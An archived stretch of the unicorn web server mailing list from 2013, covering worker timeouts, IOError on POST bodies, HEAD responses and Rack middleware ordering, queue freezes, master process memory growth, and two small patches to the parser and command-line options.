to Unicorn's behavior with respect to pid file maintenance would be
kindly appreciated.

Best regards,

--Michael

* Re: More unexplained timeouts
  @ 2013-09-30  0:06  4% ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2013-09-30  0:06 UTC (permalink / raw)
  To: unicorn list

nick@auger.net wrote:
> We're still suffering from unexplained workers timing out.  We
> recently upgraded to the latest unicorn 4.6.3 (while still on REE
> 1.8.7) in the hopes that it would solve our issues.  Unfortunately,
> this seemed to exacerbate the problem, with timeouts happening more
> frequently, but that could be related to greater precision in timeouts
> in newer versions of unicorn.  (In our unicorn 3.6.2, a timeout set to
> 120s might not ACTUALLY timeout until 180s or more, thus allowing a
> bit more time for Ruby to finish whatever it was choking on.)

Yes, there were some fixes in 4.x to improve the timeout accuracy.

> We dropped the timeout down to 65s (to make sure it was triggered) and
> then tried to add greater logging (per
> http://permalink.gmane.org/gmane.comp.lang.ruby.unicorn.general/1269.)
> The START/FINISH approach confirms it's not an issue with our
> application code, ie:
> 
> HH:MM:SS- S/F[PID]- /PATH
> 15:21:01- START-25904- /pathA
> 15:21:01- FINISH-25904- /pathA
> 15:21:01- START-25904- /pathB
> 15:21:01- FINISH-25904- /pathB
> 15:21:01- START-25904- /pathC
> 15:21:01- FINISH-25904- /pathC
> worker=11 PID:25904 timeout (66s > 65s), killing
> reaped #<Process::Status: pid=25904,signaled(SIGKILL=9)> worker=11
> 
> For each START we always get a corresponding FINISH and then the
> worker is killed.  Additionally, our nginx logs confirm that this last
> request was sent back to the client.  No 'upstream' errors in our
> nginx log, either.
> 
> When we tried the Thread sleep approach, nothing actually appeared in
> the logs.  I imagine this means that ruby or some C extension is
> misbehaving.

Sounds like it.  1.8 and old C extensions could easily lock up the
interpreter on blocking calls.

Another problem could be using new versions of C extensions that are no
longer tested under 1.8.  I admit I haven't tested recent versions of
unicorn/kgio/raindrops on 1.8 lately, either, but I'm _fairly_ sure they
still work since they haven't changed much.
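The START/FINISH logging technique quoted above can be sketched as a
minimal Rack middleware. This is a hypothetical illustration, not code
from the thread; the class name and log format are made up to match the
sample log lines:

```ruby
# Minimal sketch of START/FINISH request logging as Rack middleware.
# Class name and log format are illustrative, not from the original thread.
class StartFinishLogger
  def initialize(app, logger = $stderr)
    @app = app
    @logger = logger
  end

  def call(env)
    path = env['PATH_INFO']
    stamp('START', path)
    @app.call(env)
  ensure
    # runs even if the app raises, so a START with no matching FINISH
    # points at a hang inside application code
    stamp('FINISH', path)
  end

  private

  def stamp(tag, path)
    @logger.puts "#{Time.now.strftime('%H:%M:%S')}- #{tag}-#{Process.pid}- #{path}"
  end
end
```

In config.ru one would `use StartFinishLogger` ahead of the app; if the
worker is later killed by the timeout after a FINISH line with no new
START (as in the log above), the hang happened outside application code.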

> Unfortunately, it's been impossible for us to recreate this in
> development.  

Are you running any different gems/extensions in development vs
production?

> Thoughts?
> 
> RHEL 5.6
> REE 1.8.7 2011.12
> Unicorn 4.6.3
> 16 unicorn workers on 8 cores
> No swap activity, no peaks in load

What other gems/extensions do you use?

^ permalink raw reply	[relevance 4%]

* Re: IOError: closed stream
  @ 2013-09-24 17:39  3% ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2013-09-24 17:39 UTC (permalink / raw)
  To: unicorn list

David Judd <david@academia.edu> wrote:
> I'm getting "IOError: closed stream" from inside Unicorn occasionally
> and I don't know what to make of it. The stack trace looks like this:
> 
> unicorn (4.5.0) lib/unicorn/stream_input.rb:129:in `kgio_read' unicorn
> (4.5.0) lib/unicorn/stream_input.rb:129:in `read_all' unicorn (4.5.0)
> lib/unicorn/stream_input.rb:60:in `read' unicorn (4.5.0)
> lib/unicorn/tee_input.rb:84:in `read'
> config/initializers/rack_request.rb:19:in `POST' rack (1.4.5)
> lib/rack/request.rb:221:in `params'
> 
> Any suggestions what this might indicate? Is this what I should
> legitimately expect to see if the browser closes the connection
> abruptly?

Not a client closing the connection, that would be EOFError,
Errno::ECONNRESET or another Errno::...

IOError means something in the unicorn process closed the connection
already, which should not happen there.

Do you have anything in your Rack app which does background processing
of rack.input after the response is written?

That would be the most likely explanation...
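The distinction above can be demonstrated without a socket. A minimal
sketch (a pipe stands in for the client connection):

```ruby
# Reading an IO that our own process already closed raises IOError
# ("closed stream"); a remote peer going away instead surfaces as
# EOFError / Errno::ECONNRESET or plain EOF.
r, w = IO.pipe
r.close # simulate something in-process closing the stream early
begin
  r.read(1)
rescue IOError => e
  warn "in-process close: #{e.class}" # IOError
end
w.close

# A peer "disconnect" on a pipe: the writer closed, so the reader
# just sees EOF (nil from IO#read with a length), not IOError.
r2, w2 = IO.pipe
w2.close
warn "peer close result: #{r2.read(1).inspect}" # nil (EOF)
r2.close
```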

> It's happening only for POSTs, and a small percentage of them, but I
> can't find any further pattern - a variety of content, usually quite
> small content-lengths.
> 
> Currently we're running nginx in front of unicorn via a unix socket.
> In this state the errors occur at an almost-negligible rate. I
> experimented yesterday with moving instead to nginx in front of
> varnish, on a separate machine, with varnish then talking to unicorn
> via a TCP socket. In that configuration the errors increased
> dramatically, although the majority of requests still succeeded.

If varnish is used, nginx -> varnish -> unicorn is what I would
recommend (not that I have much experience with varnish, but when I
last looked at them, nginx was better at handling slow/idle
connections).

That said, I'm not sure what could cause the increase in errors...
Is varnish attempting to pre-connect?

Can you reproduce this error on a minimal Rack app from a client
you control?

> As you can see we're running unicorn 4.5 and rack 1.4.5 - except that
> I'm monkey-patching Rack::Request to backport the 1.5 POST method,
> which transforms an earlier nil error in to this one. (On Ruby 2.0.0,
> on an Ubuntu-precise box on AWS.)

For the minimal Rack test app, try just an unpatched Rack;
there could be a subtle compatibility problem from the monkey patch.

The basic idea is to eliminate variables and strange/uncommon things to
pinpoint the problem.

> Any relevant info or suggestions would be appreciated.

Since you're on 4.5, it would not be via rack.hijack ...

I'm not ruling out a bug in unicorn, but I don't think we've heard of
this problem before.  The code for handling rack.input hasn't been
changed much, either.  I beat the crap out of it, but usually for PUT
requests (but not using POST in Rack::Request).

> Apologies if this shows up as a double-post--my first attempt seems to
> have been rejected because I didn't turn on plain text mode.

Only saw this one.  You can check on gmane.comp.lang.ruby.unicorn.general
or http://rubyforge.org/pipermail/mongrel-unicorn
Mailman should be converting HTML to plain-text, but maybe it fails
sometimes...  I'd rather deal with an occasional double post than every
message being 2-3 times bigger due to HTML.

^ permalink raw reply	[relevance 3%]

* Re: A barrage of unexplained timeouts
  2013-08-20 21:32  4%                 ` Eric Wong
@ 2013-08-21 13:33  0%                   ` nick
  0 siblings, 0 replies; 200+ results
From: nick @ 2013-08-21 13:33 UTC (permalink / raw)
  To: unicorn list

"Eric Wong" <normalperson@yhbt.net> said:
> nick@auger.net wrote:
>> "Eric Wong" <normalperson@yhbt.net> said:
>> > nick@auger.net wrote:
>> >> "Eric Wong" <normalperson@yhbt.net> said:
>> > I'm stumped :<
>>
>> I was afraid you'd say that :(.
> 
> Actually, another potential issue is DNS lookups timing out.  But they
> shouldn't take *that* long...
> 
>> > Do you have any background threads running that could be hanging the
>> > workers?   This is Ruby 1.8, after all, so there's more likely to be
>> > some blocking call hanging the entire process.  AFAIK, some monitoring
>> > software runs a background thread in the unicorn worker and maybe the
>> > OpenSSL extension doesn't work as well if it encountered network
>> > problems under Ruby 1.8
>>
>> We don't explicitly create any threads in our rails code.  We do
>> communicate with backgroundrb worker processes, although, none of the
>> strangeness today involved any routes that would hit backgroundrb
>> workers.
> 
> I proactively audit every piece of code (including external
> libraries/gems) loaded by an app for potentially blocking calls (hits to
> the filesystem, socket calls w/o timeout/blocking).   I use strace to
> help me find that sometimes...
> 
>> Is there any instrumentation that I could add that might help
>> debugging in the future? ($request_time and $upstream_response_time
>> are now in my nginx logs.)  We have noticed these "unexplainable
>> timeouts" before, but typically for a single worker.  If there's some
>> debugging that could be added I might be able to track it down during
>> these one-off events.
> 
> As an experiment, can you replay traffic a few minutes leading up to and
> including that 7m period in a test setup with only one straced worker?

I've replayed this in a development environment without triggering the issue.  Lack of POST payloads and slight differences between the two environments make this difficult to test.

> Run "strace -T -f -o $FILE -p $PID_OF_WORKER" and see if there's any
> unexpected/surprising dependencies (connect() to unrecognized addresses,
> open() to networked filesystems, fcntl locks, etc...).
> 
> You can play around with some other strace options (-v/-s SIZE/-e filters)

I'll do my best to look at the output for anything out of the ordinary.  Unfortunately, strace is a new tool for me and is a bit out of my wheelhouse.



^ permalink raw reply	[relevance 0%]

* Re: A barrage of unexplained timeouts
  @ 2013-08-20 21:32  4%                 ` Eric Wong
  2013-08-21 13:33  0%                   ` nick
  0 siblings, 1 reply; 200+ results
From: Eric Wong @ 2013-08-20 21:32 UTC (permalink / raw)
  To: unicorn list

nick@auger.net wrote:
> "Eric Wong" <normalperson@yhbt.net> said:
> > nick@auger.net wrote:
> >> "Eric Wong" <normalperson@yhbt.net> said:
> > I'm stumped :<
> 
> I was afraid you'd say that :(.

Actually, another potential issue is DNS lookups timing out.  But they
shouldn't take *that* long...

> > Do you have any background threads running that could be hanging the
> > workers?   This is Ruby 1.8, after all, so there's more likely to be
> > some blocking call hanging the entire process.  AFAIK, some monitoring
> > software runs a background thread in the unicorn worker and maybe the
> > OpenSSL extension doesn't work as well if it encountered network
> > problems under Ruby 1.8
> 
> We don't explicitly create any threads in our rails code.  We do
> communicate with backgroundrb worker processes, although, none of the
> strangeness today involved any routes that would hit backgroundrb
> workers.

I proactively audit every piece of code (including external
libraries/gems) loaded by an app for potentially blocking calls (hits to
the filesystem, socket calls w/o timeout/blocking).   I use strace to
help me find that sometimes...

> Is there any instrumentation that I could add that might help
> debugging in the future? ($request_time and $upstream_response_time
> are now in my nginx logs.)  We have noticed these "unexplainable
> timeouts" before, but typically for a single worker.  If there's some
> debugging that could be added I might be able to track it down during
> these one-off events.

As an experiment, can you replay traffic a few minutes leading up to and
including that 7m period in a test setup with only one straced worker?

Run "strace -T -f -o $FILE -p $PID_OF_WORKER" and see if there's any
unexpected/surprising dependencies (connect() to unrecognized addresses,
open() to networked filesystems, fcntl locks, etc...).

You can play around with some other strace options (-v/-s SIZE/-e filters)

Maybe you'll find something, there.

^ permalink raw reply	[relevance 4%]

* Re: HEAD responses contain body
  2013-06-13 19:28  0%       ` Jonathan Rudenberg
@ 2013-06-13 19:34  0%         ` Jonathan Rudenberg
  0 siblings, 0 replies; 200+ results
From: Jonathan Rudenberg @ 2013-06-13 19:34 UTC (permalink / raw)
  To: Eric Wong; +Cc: unicorn list


On Jun 13, 2013, at 3:28 PM, Jonathan Rudenberg <jonathan@titanous.com> wrote:

> 
> On Jun 13, 2013, at 3:21 PM, Eric Wong <normalperson@yhbt.net> wrote:
> 
>> Jonathan Rudenberg <jonathan@titanous.com> wrote:
>>> On Jun 13, 2013, at 2:22 PM, Eric Wong <normalperson@yhbt.net> wrote:
>>>> Jonathan Rudenberg <jonathan@titanous.com> wrote:
>>>>> RFC 2616 section 9.4[1] states:
>>>>> 
>>>>>> The HEAD method is identical to GET except that the server MUST NOT return a message-body in the response.
>>>>> 
>>>>> A HEAD request against this simple Rack app running on unicorn-4.6.2:
>>>>> 
>>>>>  require 'rack'
>>>>> 
>>>> 
>>>> +     use Rack::Head
>>>> 
>>>>>  run lambda { |env| [200, {}, []] }
>>>> 
>>>> The Rack::Head middleware should be used to correctly strip HEAD
>>>> responses of their bodies (frameworks such as Rails/Sinatra should
>>>> already add Rack::Head to the middleware stack for you)
>>> 
>>> This does not change the result, as the Rack::Head implementation looks like this:
>>> 
>>>   def call(env)
>>>     status, headers, body = @app.call(env)
>>> 
>>>     if env["REQUEST_METHOD"] == "HEAD"
>>>       body.close if body.respond_to? :close
>>>       [status, headers, []]
>>>     else
>>>       [status, headers, body]
>>>     end
>>>   end
>> 
>> OK, I think you were hitting another problem because you were lacking
>> Rack::ContentType
>> 
>> Try the following:
>> -----------------------8<---------------------
>> require 'rack'
>> use Rack::ContentLength # less ambiguous than Rack::Chunked adding '0'
>> use Rack::Head
>> use Rack::ContentType
>> run lambda { |env| [200, {}, []] }
>> -----------------------8<---------------------
> 
> Thanks, this stack works.
> 
>> I added the Rack::ContentLength (it's already in the default middleware
>> stack) since I believe Rack::Chunked adding the '0' is a violation of
>> rfc2616... I'll need to read more closely to be sure.
> 
> Hmm, so this is a bug in Rack::Chunked? My reading of the spec says that the '0' is incorrect.

Actually, the solution is that Rack::Head needs to come before Rack::Chunked. Perhaps Rack's default development stack should order them that way?
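The ordering issue can be demonstrated without a server. Below is a
self-contained sketch using simplified stand-ins for Rack::Head and
Rack::Chunked (these are not the real Rack classes): only when Head
wraps Chunked does a HEAD response end up with an empty body.

```ruby
# Simplified stand-ins to show why middleware ordering matters here.
head = lambda do |app|
  lambda do |env|
    status, headers, body = app.call(env)
    env['REQUEST_METHOD'] == 'HEAD' ? [status, headers, []] : [status, headers, body]
  end
end

# Like Rack::Chunked, always emits a terminating "0" chunk.
chunked = lambda do |app|
  lambda do |env|
    status, headers, body = app.call(env)
    chunks = body.map { |c| "#{c.bytesize.to_s(16)}\r\n#{c}\r\n" }
    [status, headers, chunks + ["0\r\n\r\n"]]
  end
end

app = lambda { |env| [200, {}, ['hi']] }
env = { 'REQUEST_METHOD' => 'HEAD' }

# "use Head" before "use Chunked" in config.ru means Head wraps Chunked:
good = head.call(chunked.call(app))
_, _, body = good.call(env)
p body # => [] -- HEAD body correctly stripped after chunking

# The other way around, Chunked runs last and re-adds the "0" chunk:
bad = chunked.call(head.call(app))
_, _, body = bad.call(env)
p body # => ["0\r\n\r\n"] -- non-empty body on a HEAD response
```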


^ permalink raw reply	[relevance 0%]

* Re: HEAD responses contain body
  @ 2013-06-13 19:21  4%     ` Eric Wong
  2013-06-13 19:28  0%       ` Jonathan Rudenberg
  0 siblings, 1 reply; 200+ results
From: Eric Wong @ 2013-06-13 19:21 UTC (permalink / raw)
  To: Jonathan Rudenberg; +Cc: unicorn list

Jonathan Rudenberg <jonathan@titanous.com> wrote:
> On Jun 13, 2013, at 2:22 PM, Eric Wong <normalperson@yhbt.net> wrote:
> > Jonathan Rudenberg <jonathan@titanous.com> wrote:
> >> RFC 2616 section 9.4[1] states:
> >> 
> >>> The HEAD method is identical to GET except that the server MUST NOT return a message-body in the response.
> >> 
> >> A HEAD request against this simple Rack app running on unicorn-4.6.2:
> >> 
> >>    require 'rack'
> >> 
> > 
> > +     use Rack::Head
> > 
> >>    run lambda { |env| [200, {}, []] }
> > 
> > The Rack::Head middleware should be used to correctly strip HEAD
> > responses of their bodies (frameworks such as Rails/Sinatra should
> > already add Rack::Head to the middleware stack for you)
> 
> This does not change the result, as the Rack::Head implementation looks like this:
> 
>     def call(env)
>       status, headers, body = @app.call(env)
> 
>       if env["REQUEST_METHOD"] == "HEAD"
>         body.close if body.respond_to? :close
>         [status, headers, []]
>       else
>         [status, headers, body]
>       end
>     end

OK, I think you were hitting another problem because you were lacking
Rack::ContentType

Try the following:
-----------------------8<---------------------
require 'rack'
use Rack::ContentLength # less ambiguous than Rack::Chunked adding '0'
use Rack::Head
use Rack::ContentType
run lambda { |env| [200, {}, []] }
-----------------------8<---------------------

I added the Rack::ContentLength (it's already in the default middleware
stack) since I believe Rack::Chunked adding the '0' is a violation of
rfc2616... I'll need to read more closely to be sure.

> >>    HTTP/1.1 500 Internal Server Error
> > 
> >> As you can see, not only is there a zero-length chunked encoding body,
> >> but for some unknown reason there is a 500 response with no body as
> >> well.
> > 
> > Try using "-d" on the command-line to enable debugging to see what the
> > error is (and check the logs/stderr output).
> 
>     Exception `Errno::ENOTCONN' at /Users/titanous/.gem/ruby/1.9.3/gems/unicorn-4.6.2/lib/unicorn/http_server.rb:565 - Socket is not connected

Ugh, that's an unfortunate side effect of the client closing the
connection, first :/

> > Also, what RACK_ENV (or -E/--env) are you using?  It could be the
> > incorrect HEAD response tripping Rack::Lint under development mode.
> 
> None, specified, I'm booting unicorn with no configuration or flags specified.

That defaults RACK_ENV to "development", so you got
Rack::ContentLength, Rack::Chunked, Rack::CommonLogger,
Rack::ShowExceptions and Rack::Lint
_______________________________________________
Unicorn mailing list - mongrel-unicorn@rubyforge.org
http://rubyforge.org/mailman/listinfo/mongrel-unicorn
Do not quote signatures (like this one) or top post when replying

^ permalink raw reply	[relevance 4%]

* Re: HEAD responses contain body
  2013-06-13 19:21  4%     ` Eric Wong
@ 2013-06-13 19:28  0%       ` Jonathan Rudenberg
  2013-06-13 19:34  0%         ` Jonathan Rudenberg
  0 siblings, 1 reply; 200+ results
From: Jonathan Rudenberg @ 2013-06-13 19:28 UTC (permalink / raw)
  To: Eric Wong; +Cc: unicorn list


On Jun 13, 2013, at 3:21 PM, Eric Wong <normalperson@yhbt.net> wrote:

> Jonathan Rudenberg <jonathan@titanous.com> wrote:
>> On Jun 13, 2013, at 2:22 PM, Eric Wong <normalperson@yhbt.net> wrote:
>>> Jonathan Rudenberg <jonathan@titanous.com> wrote:
>>>> RFC 2616 section 9.4[1] states:
>>>> 
>>>>> The HEAD method is identical to GET except that the server MUST NOT return a message-body in the response.
>>>> 
>>>> A HEAD request against this simple Rack app running on unicorn-4.6.2:
>>>> 
>>>>   require 'rack'
>>>> 
>>> 
>>> +     use Rack::Head
>>> 
>>>>   run lambda { |env| [200, {}, []] }
>>> 
>>> The Rack::Head middleware should be used to correctly strip HEAD
>>> responses of their bodies (frameworks such as Rails/Sinatra should
>>> already add Rack::Head to the middleware stack for you)
>> 
>> This does not change the result, as the Rack::Head implementation looks like this:
>> 
>>    def call(env)
>>      status, headers, body = @app.call(env)
>> 
>>      if env["REQUEST_METHOD"] == "HEAD"
>>        body.close if body.respond_to? :close
>>        [status, headers, []]
>>      else
>>        [status, headers, body]
>>      end
>>    end
> 
> OK, I think you were hitting another problem because you were lacking
> Rack::ContentType
> 
> Try the following:
> -----------------------8<---------------------
> require 'rack'
> use Rack::ContentLength # less ambiguous than Rack::Chunked adding '0'
> use Rack::Head
> use Rack::ContentType
> run lambda { |env| [200, {}, []] }
> -----------------------8<---------------------

Thanks, this stack works.

> I added the Rack::ContentLength (it's already in the default middleware
> stack) since I believe Rack::Chunked adding the '0' is a violation of
> rfc2616... I'll need to read more closely to be sure.

Hmm, so this is a bug in Rack::Chunked? My reading of the spec says that the '0' is incorrect.

^ permalink raw reply	[relevance 0%]

* Re: Unicorn freezes, requests got stuck in the queue most likely
  2013-05-28 11:17  4% Unicorn freezes, requests got stuck in the queue most likely Alexander Dymo
@ 2013-05-28 17:20  0% ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2013-05-28 17:20 UTC (permalink / raw)
  To: unicorn list; +Cc: Gleb Arshinov

Alexander Dymo <adymo@pluron.com> wrote:
> In short:
> - we have two groups of workers:
>   - one serving long-running requests that take more than 10 sec, listening to a '/tmp/long_requests_unicorn.sock' socket
>   - another serving normal requests, listening to '/tmp/unicorn.sock' socket
> - nginx determines which request goes to which sockets.
> 
> This worked perfectly for 2 years. Looks like after we upgraded to
> unicorn 4.4, the normal requests started to get stuck in the queue.
> That happens randomly, several times per day. When that happens,
> requests wait for up to 7 seconds to be served. At that time most or
> all of the workers are available and not doing anything. Unicorn
> restart fixes the problem.

How are you determining requests get stuck for up to 7 seconds?
Just hitting the app?

How is the system (CPU/RAM/swap usage) around this time?

Are you using Raindrops::LastDataRecv or Raindrops::Watcher?
(If not and you're on Linux, please give them a try[1]).

Anything in the stderr logs?  Dying/restarted workers might cause
this.  Otherwise, I'd look for unexpected long-running requests
in your Rails logs.

> Has anyone seen freezes like that? I'd appreciate any help
> with debugging and understanding this problem.

I certainly have not.  Did you perform any other upgrades around this
point?

Can you try reverting to 4.3.1 (or earlier, and not changing anything else)
and see if the problem presents itself there?

Also, which OS/version is this?


[1] http://raindrops.bogomips.org/

^ permalink raw reply	[relevance 0%]

* Unicorn freezes, requests got stuck in the queue most likely
@ 2013-05-28 11:17  4% Alexander Dymo
  2013-05-28 17:20  0% ` Eric Wong
  0 siblings, 1 reply; 200+ results
From: Alexander Dymo @ 2013-05-28 11:17 UTC (permalink / raw)
  To: unicorn list; +Cc: Gleb Arshinov

Hi,

I'd appreciate advice on how to debug the following problem: unicorn sometimes freezes for 6-7 seconds and stops taking new requests, then resumes as if nothing happened. Details below.

My setup:
- nginx 0.7.67 proxying requests to unicorn
- unicorn 4.4.0
- rails 2.3.x application

Unicorn is set up as I've described in this list earlier:
http://rubyforge.org/pipermail/mongrel-unicorn/2010-November/000770.html

In short:
- we have two groups of workers:
   - one serving long-running requests that take more than 10 sec, listening to a '/tmp/long_requests_unicorn.sock' socket
   - another serving normal requests, listening to '/tmp/unicorn.sock' socket
- nginx determines which request goes to which sockets.

This worked perfectly for 2 years. Looks like after we upgraded to unicorn 4.4, the normal requests started to get stuck in the queue. That happens randomly, several times per day. When that happens, requests wait for up to 7 seconds to be served. At that time most or all of the workers are available and not doing anything. Unicorn restart fixes the problem.

Has anyone seen freezes like that? I'd appreciate any help with debugging and understanding this problem.

^ permalink raw reply	[relevance 4%]

* Re: Growing memory use of master process
  2013-05-15  8:52  4% Growing memory use of master process Andrew Stewart
@ 2013-05-15  9:28  0% ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2013-05-15  9:28 UTC (permalink / raw)
  To: unicorn list

Andrew Stewart <boss@airbladesoftware.com> wrote:
> I was wondering why my Unicorn master process's memory use grows over
> time.
> 
> As I understand it, when I (re)start Unicorn a master process spins
> up which loads my Rails app.  The master process then brings up worker
> processes which handle traffic to the app.

Correct, the master should not grow.  If you're using "preload_app true",
can you reproduce the growth without it?

> As time passes I'm not surprised to see the workers use more memory:
> Ruby 1.9's garbage collector doesn't free as much memory as it could and
> it's not inconceivable that my code is somewhat relaxed about creating
> objects.
> 
> However if the workers are handling the traffic, why does the master
> process's footprint grow?  Is it simply the inefficient garbage
> collector or is there another reason which, hopefully, I could address?

If you're using preload_app, I suspect it's some background thread
or hook causing it.  Otherwise, can you reproduce this with a barebones
application?

^ permalink raw reply	[relevance 0%]

* Growing memory use of master process
@ 2013-05-15  8:52  4% Andrew Stewart
  2013-05-15  9:28  0% ` Eric Wong
  0 siblings, 1 reply; 200+ results
From: Andrew Stewart @ 2013-05-15  8:52 UTC (permalink / raw)
  To: mongrel-unicorn

Hello,

I was wondering why my Unicorn master process's memory use grows over
time.

As I understand it, when I (re)start Unicorn a master process spins
up which loads my Rails app.  The master process then brings up worker
processes which handle traffic to the app.

As time passes I'm not surprised to see the workers use more memory:
Ruby 1.9's garbage collector doesn't free as much memory as it could and
it's not inconceivable that my code is somewhat relaxed about creating
objects.

However if the workers are handling the traffic, why does the master
process's footprint grow?  Is it simply the inefficient garbage
collector or is there another reason which, hopefully, I could address?

Thanks in advance.

Yours,
Andy Stewart


^ permalink raw reply	[relevance 4%]

* [PATCH] HttpParser#next? becomes response_start_sent-aware
@ 2013-05-08 23:01  9% Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2013-05-08 23:01 UTC (permalink / raw)
  To: mongrel-unicorn

This could allow servers with persistent connection support[1]
to support our check_client_connection in the future.

[1] - Rainbows!/zbatery, possibly others
---
 ext/unicorn_http/unicorn_http.rl |  6 ++----
 test/unit/test_http_parser_ng.rb | 17 +++++++++++++++++
 2 files changed, 19 insertions(+), 4 deletions(-)

diff --git a/ext/unicorn_http/unicorn_http.rl b/ext/unicorn_http/unicorn_http.rl
index 1a8003f..3529740 100644
--- a/ext/unicorn_http/unicorn_http.rl
+++ b/ext/unicorn_http/unicorn_http.rl
@@ -732,10 +732,8 @@ static VALUE HttpParser_parse(VALUE self)
   struct http_parser *hp = data_get(self);
   VALUE data = hp->buf;
 
-  if (HP_FL_TEST(hp, TO_CLEAR)) {
-    http_parser_init(hp);
-    rb_funcall(hp->env, id_clear, 0);
-  }
+  if (HP_FL_TEST(hp, TO_CLEAR))
+    HttpParser_clear(self);
 
   http_parser_execute(hp, RSTRING_PTR(data), RSTRING_LEN(data));
   if (hp->offset > MAX_HEADER_LEN)
diff --git a/test/unit/test_http_parser_ng.rb b/test/unit/test_http_parser_ng.rb
index 93c44bb..ab335ac 100644
--- a/test/unit/test_http_parser_ng.rb
+++ b/test/unit/test_http_parser_ng.rb
@@ -12,6 +12,23 @@ def setup
     @parser = HttpParser.new
   end
 
+  def test_next_clear
+    r = "GET / HTTP/1.1\r\nHost: example.com\r\n\r\n"
+    @parser.buf << r
+    @parser.parse
+    @parser.response_start_sent = true
+    assert @parser.keepalive?
+    assert @parser.next?
+    assert @parser.response_start_sent
+
+    # persistent client makes another request:
+    @parser.buf << r
+    @parser.parse
+    assert @parser.keepalive?
+    assert @parser.next?
+    assert_equal false, @parser.response_start_sent
+  end
+
   def test_keepalive_requests_default_constant
     assert_kind_of Integer, HttpParser::KEEPALIVE_REQUESTS_DEFAULT
     assert HttpParser::KEEPALIVE_REQUESTS_DEFAULT >= 0
-- 
Eric Wong

^ permalink raw reply related	[relevance 9%]

* [PATCH] Add -N or --no-default-middleware option.
@ 2013-01-29  3:21  3% Lin Jen-Shin
  0 siblings, 0 replies; 200+ results
From: Lin Jen-Shin @ 2013-01-29  3:21 UTC (permalink / raw)
  To: mongrel-unicorn; +Cc: Lin Jen-Shin

This would prevent Unicorn from adding default middleware,
as if RACK_ENV were always none. (not development nor deployment)

This should also be applied to `rainbows' and `zbatery' as well.

One of the reasons to add this is to avoid conflicts between
RAILS_ENV and RACK_ENV. It would be helpful in the case
where a Rails application and a Rack application are composed
together and we want the Rails app to run under development
while the Rack app runs under none (so it gets no default
middleware), without setting RAILS_ENV to development and
RACK_ENV to none, which might be confusing. Note that Rails
would also look at RACK_ENV.

Another reason is that only `rackup' inserts those default
middleware. Neither `thin' nor `puma' does this, nor does
Rack::Handler.get.run, which is used by Sinatra.

So using this option would make unicorn behave differently from
`rackup' but more like `thin' or `puma'.

Discussion thread on the mailing list:
http://rubyforge.org/pipermail/mongrel-unicorn/2013-January/001675.html
---
 bin/unicorn    | 5 +++++
 lib/unicorn.rb | 2 ++
 2 files changed, 7 insertions(+)

diff --git a/bin/unicorn b/bin/unicorn
index 9962b58..415d164 100755
--- a/bin/unicorn
+++ b/bin/unicorn
@@ -58,6 +58,11 @@ op = OptionParser.new("", 24, '  ') do |opts|
     ENV["RACK_ENV"] = e
   end
 
+  opts.on("-N", "--no-default-middleware",
+          "no default middleware even if RACK_ENV is development") do |e|
+    rackup_opts[:no_default_middleware] = true
+  end
+
   opts.on("-D", "--daemonize", "run daemonized in the background") do |d|
     rackup_opts[:daemonize] = !!d
   end
diff --git a/lib/unicorn.rb b/lib/unicorn.rb
index d96ff91..f0ceffe 100644
--- a/lib/unicorn.rb
+++ b/lib/unicorn.rb
@@ -49,6 +49,8 @@ module Unicorn
 
       pp({ :inner_app => inner_app }) if $DEBUG
 
+      return inner_app if op[:no_default_middleware]
+
       # return value, matches rackup defaults based on env
       # Unicorn does not support persistent connections, but Rainbows!
       # and Zbatery both do.  Users accustomed to the Rack::Server default
-- 
1.8.1.1


^ permalink raw reply related	[relevance 3%]

* Re: No middleware without touching RACK_ENV
  2013-01-25 10:52  2% No middleware without touching RACK_ENV Lin Jen-Shin (godfat)
@ 2013-01-25 18:39  0% ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2013-01-25 18:39 UTC (permalink / raw)
  To: unicorn list

"Lin Jen-Shin (godfat)" <godfat@godfat.org> wrote:
> Hi,
> 
> This might be a bit silly, but finally I decided to bring this up.
> 
> We're running a Rails app along with another Rack app in
> the same config.ru, and what I want to do is tell Unicorn
> that we don't want any middleware which Unicorn might
> insert with RACK_ENV=development and RACK_ENV=
> deployment, because we're adding Rack::CommonLogger
> and other middleware by ourselves, while we're using
> RACK_ENV=development for Rails when developing.

Doesn't Rails favor RAILS_ENV over RACK_ENV?  unicorn ignores RAILS_ENV
(unicorn_rails respects RAILS_ENV, but unicorn_rails isn't recommended
for modern (Rack-enabled) Rails)

> That is, we want to use RACK_ENV=development for Rails
> because that's how it used to be, but we also don't want
> those additional middleware inserted automatically.
> This has no problem with RACK_ENV=production.

Is there a benefit which RACK_ENV=development gives you for Rails
that RAILS_ENV=development does not give you?

Fwiw, the times I worked on Rails, I used customized dev environments
anyways, so I would use RAILS_ENV=dev_local or RAILS_ENV=dev_$NETWORK
for switching between a localhost-only vs networked setup.

> I know this is somehow a spec from Rack, but I guess I
> don't like this behaviour. One workaround would be
> providing a `after_app_load' hook, and we add this to
> the bottom of config.ru:
> 
>   ENV['RACK_ENV_ORIGINAL'] = ENV['RACK_ENV']
>   ENV['RACK_ENV'] = 'none'
> 
> and add this to the unicorn configuration file:
> 
>   after_app_load do |_|
>     ENV['RACK_ENV'] = ENV['RACK_ENV_ORIGINAL']
>   end
> 
> This is probably a stupid hack, but I wonder if after_app_load
> hook would be useful for other cases?

I don't see how this hook has benefits over putting this in config.ru
(or somewhere else in your app, since your app is already loaded...)

I'd imagine users wanting the same app-wide settings going between
different application servers, too.

> Or if we could have an option to turn off this Rack behaviour
> simulation, like:
> 
>     default_middleware false
> 
> That might be more straightforward for what we want. Oh but
> it seems it's not that easy to add this. What about an option
> for unicorn?
> 
>     unicorn -E development -N
> 
> or
> 
>     unicorn -E development --no-default-middleware

I'm against adding more command-line or config options, especially
around loading middleware.  RACK_ENV is already a source of confusion,
and Rails also has (or had?) its own middleware loading scheme
independent of config.ru.

> This would need to be applied to `rainbows' and `zbatery', too,
> though. Patches below for consideration:
> (Sorry if Gmail messed the format up, but the last time
> I tried, it didn't accept attachments :( What's the best way?
> Links to raw patches?)

git format-patch + git send-email is the recommended way if your
mail client cannot be taught to leave formatting alone.  Also this
is easy for sending multiple patches in the same thread.

git format-patch --stdout with a good mail client which will not wrap
messages is also great (especially for single patches).

